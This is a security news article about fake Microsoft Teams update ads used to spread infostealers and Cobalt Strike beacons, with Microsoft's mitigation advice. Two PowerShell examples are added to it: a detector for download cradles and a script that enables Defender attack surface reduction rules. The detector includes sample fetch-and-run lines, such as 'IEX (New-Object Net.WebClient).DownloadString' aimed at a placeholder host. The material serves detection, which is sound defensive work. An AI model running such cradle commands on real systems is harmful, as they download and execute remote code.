Fake Microsoft Teams updates lead to Cobalt Strike deployment

Ransomware operators use malicious fake ads for Microsoft Teams updates to infect systems with Cobalt Strike backdoors and then endanger the rest of the network.

Ransomware attacks have long targeted organizations across many industries, but the most recent ones have focused on education, a sector that depends on video-conferencing solutions because of the Covid-19 restrictions.

FakeUpdates attacks first appeared in 2019, delivering the DoppelPaymer ransomware. This year, malvertising campaigns dropped the WastedLocker ransomware and showed clear technical advances.

More recently, attackers exploited the critical ZeroLogon vulnerability (CVE-2020-1472) to gain administrator access to the network. This happened via the SocGholish framework, which was found earlier this year on dozens of compromised newspaper websites belonging to the same company.

The attackers place malicious fake ads that lure unsuspecting users into clicking them to install an "update" which is in fact a booby-trapped installer.

In at least one attack observed by Microsoft, the attackers targeted Teams software. They ran ads for Teams that carried malicious links. Clicking the link downloaded a payload that executed a PowerShell script to retrieve further malicious content.

The payload also installed a legitimate copy of Microsoft Teams on the system, so that the victims would not become suspicious.

Microsoft says that in many cases the initial payload was the Predator the Thief infostealer, which sends the attacker sensitive data such as credentials, browser data and payment data. Other malware distributed this way includes the Bladabindi (NJRat) backdoor and the ZLoader stealer.

The malware also downloaded other payloads, Cobalt Strike beacons among them, allowing the attacker to work out how to move laterally across the network.
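The chain above hinges on a first-stage payload running PowerShell to fetch more content. The following is an added example, not code from the iGuRu.gr article or from Microsoft's advisory: a small detector for PowerShell "download cradles" that inspects script-block text of the kind recorded by Script Block Logging (Event ID 4104). The pattern lists and the sample script blocks are assumptions constructed for this example, not indicators published with the advisory.

```powershell
# Added example (not from the article or Microsoft): flag PowerShell script
# blocks that fetch remote content and then execute or decode it, the
# "download cradle" shape used when a dropper pulls second-stage payloads.
# Pattern lists and samples below are constructed assumptions for this demo.

# Patterns that fetch remote content.
$FetchPatterns = @(
    'Net\.WebClient',
    'Download(String|File|Data)',
    'Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b',
    'Invoke-RestMethod|\birm\b',
    'Start-BitsTransfer|bitsadmin'
)

# Patterns that execute or decode what was fetched.
$ExecPatterns = @(
    'Invoke-Expression|\biex\b',
    'Start-Process|\bsaps\b',
    'FromBase64String|-EncodedCommand|\s-enc\s',
    '\[Reflection\.Assembly\]::Load'
)

function Test-DownloadCradle {
    # Verdict per script block:
    #   Suspicious : fetches remote content AND executes/decodes it
    #   Review     : fetches remote content only
    #   Benign     : neither
    param([Parameter(Mandatory)][string]$ScriptBlockText)

    $fetch = @($FetchPatterns | Where-Object { $ScriptBlockText -imatch $_ })
    $exec  = @($ExecPatterns  | Where-Object { $ScriptBlockText -imatch $_ })

    $verdict = 'Benign'
    if ($fetch.Count -gt 0) { $verdict = 'Review' }
    if ($fetch.Count -gt 0 -and $exec.Count -gt 0) { $verdict = 'Suspicious' }

    [pscustomobject]@{
        Verdict = $verdict
        Fetch   = ($fetch -join '; ')
        Exec    = ($exec -join '; ')
        Snippet = $ScriptBlockText.Substring(0, [Math]::Min(70, $ScriptBlockText.Length))
    }
}

# Constructed sample script blocks (not real 4104 records; example.invalid is a reserved name).
$samples = @(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/TeamsUpdate.ps1')",
    '$o="$env:TEMP\Teams.exe"; Invoke-WebRequest -Uri http://example.invalid/t.bin -OutFile $o; Start-Process $o',
    'Get-ChildItem $env:USERPROFILE -Recurse | Measure-Object',
    'Invoke-WebRequest -Uri https://example.invalid/health -UseBasicParsing'
)

# Expected: Suspicious, Suspicious, Benign, Review
$samples | ForEach-Object { Test-DownloadCradle -ScriptBlockText $_ } | Format-Table -AutoSize
```

To run this over real data, pipe the `ScriptBlockText` property of Event ID 4104 records (for example from `Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational'`) into `Test-DownloadCradle` instead of the constructed samples; "Review" hits are common in legitimate administration, so tune the fetch-only verdict to your environment.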

Microsoft warns that the same patterns seen in the FakeUpdates campaigns using the Teams update lure have been found in at least six other campaigns. In some variants of the same attack, the attackers used the IP Logger URL-shortening service.

Microsoft recommends using web browsers that can filter and block malicious sites (scam, phishing, malware and exploit-hosting sites), together with strong, random passwords for local administrator accounts.

Restricting administrator privileges to essential users and avoiding domain-wide service accounts with administrator-level rights are also on the list of measures that reduce the impact of an attack.

To minimize risk, Microsoft recommends blocking executable files from running unless they meet criteria such as prevalence or age, or are on a regularly maintained trusted list.

Blocking JavaScript and VBScript from launching downloaded executable content adds a further important layer of defense.
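The last two recommendations map onto two Microsoft Defender attack surface reduction (ASR) rules. The following is an added example, not code from the article or from Microsoft's advisory, showing how to enable those rules, audit first and block afterwards, and verify the resulting state. It assumes an elevated PowerShell session on a Windows host running Microsoft Defender Antivirus; the rule IDs are Microsoft's published GUIDs for these rules, and `$Mode` is a variable introduced here for the example.

```powershell
# Added example (not from the article or Microsoft): enable the two ASR rules
# behind the recommendations above and verify them. Run elevated on a host with
# Microsoft Defender Antivirus. Set $Mode to 'AuditMode' first, review the
# Defender Operational log (Event ID 1122 = audited ASR hit, 1121 = blocked),
# then re-run with 'Enabled' once no legitimate software is affected.
$Mode = 'AuditMode'   # 'AuditMode' or 'Enabled' (assumption: variable added for this example)

# Block executable files from running unless they meet a prevalence, age,
# or trusted list criterion.
$RuleBlockUntrustedExecutables = '01443614-cd74-433a-b99e-2ecdc07bfc25'
# Block JavaScript or VBScript from launching downloaded executable content.
$RuleBlockScriptLaunchedDownloads = 'd3e037e1-3eb8-44c8-a917-57927947596d'

$Rules = @($RuleBlockUntrustedExecutables, $RuleBlockScriptLaunchedDownloads)

function Set-AsrRules {
    param(
        [Parameter(Mandatory)][string[]]$Ids,
        [Parameter(Mandatory)][ValidateSet('AuditMode', 'Enabled', 'Disabled')][string]$Action
    )
    # Add-MpPreference merges into the existing rule list rather than replacing it,
    # so other rules already configured on the host are left untouched.
    foreach ($id in $Ids) {
        Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions $Action
    }
}

function Get-AsrRuleState {
    param([Parameter(Mandatory)][string[]]$Ids)
    $pref = Get-MpPreference
    $configuredIds = @($pref.AttackSurfaceReductionRules_Ids)
    foreach ($id in $Ids) {
        # GUID comparison is done case-insensitively; Defender may store them in upper case.
        $index = -1
        for ($k = 0; $k -lt $configuredIds.Count; $k++) {
            if ($configuredIds[$k] -ieq $id) { $index = $k; break }
        }
        $code = if ($index -ge 0) { $pref.AttackSurfaceReductionRules_Actions[$index] } else { $null }
        # Action codes: 0 = Disabled, 1 = Block, 2 = Audit, 6 = Warn; absent = not configured.
        $state = switch ($code) {
            0       { 'Disabled' }
            1       { 'Block' }
            2       { 'Audit' }
            6       { 'Warn' }
            default { 'NotConfigured' }
        }
        [pscustomobject]@{ RuleId = $id; State = $state }
    }
}

Set-AsrRules -Ids $Rules -Action $Mode
Get-AsrRuleState -Ids $Rules | Format-Table -AutoSize
```

Rolling out in audit mode first matters for the executable-prevalence rule in particular: in-house or newly built tools are exactly the low-prevalence binaries it targets, so collect Event ID 1122 hits for a while and add exclusions or a trusted-list entry before switching to block.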

iGuRu.gr The Best Technology Site in Greece


Written by Anastasis Vasileiadis
